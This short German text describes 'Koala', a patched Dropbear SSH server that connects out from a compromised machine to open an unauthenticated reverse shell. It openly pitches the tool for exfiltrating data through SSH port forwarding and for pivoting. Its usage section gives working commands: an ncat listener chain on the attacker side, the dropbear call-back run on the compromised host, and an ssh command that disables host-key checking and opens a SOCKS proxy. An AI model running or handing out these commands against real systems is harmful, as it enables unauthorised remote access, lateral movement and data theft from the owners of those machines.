
Modifizierter Dropbear-Server, der als Client fungiert und eine Anmeldung ohne Authentifizierung ermöglicht
Koala ist eine gepatchte Version des Dropbear-SSH-Servers, die anstatt einen Port zu binden, Reverse-Shells öffnet, indem sie sich mit einem entfernten Client verbindet.
Dies ist nützlich, um ein pty-Terminal auf einer kompromittierten Maschine zu erhalten und auch für die sichere Exfiltration von Daten über SSH-Portweiterleitung. Pivoting kann ebenfalls über die dynamische SSH-Portweiterleitungsfunktion durchgeführt werden.
[Nutzung]
Führe den folgenden Befehl auf dem Client aus, um auf die SSH-Verbindung zu lauschen: $ ncat -lvp 5000 --sh-exec 'ncat -lvp 9999'
Auf dem kompromittierten Host ausführen: $ ./dropbear -p client-host:5000
Dann auf dem Client mit Port 9999 verbinden, um eine Shell zu öffnen: $ ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null localhost -D9050 -p9999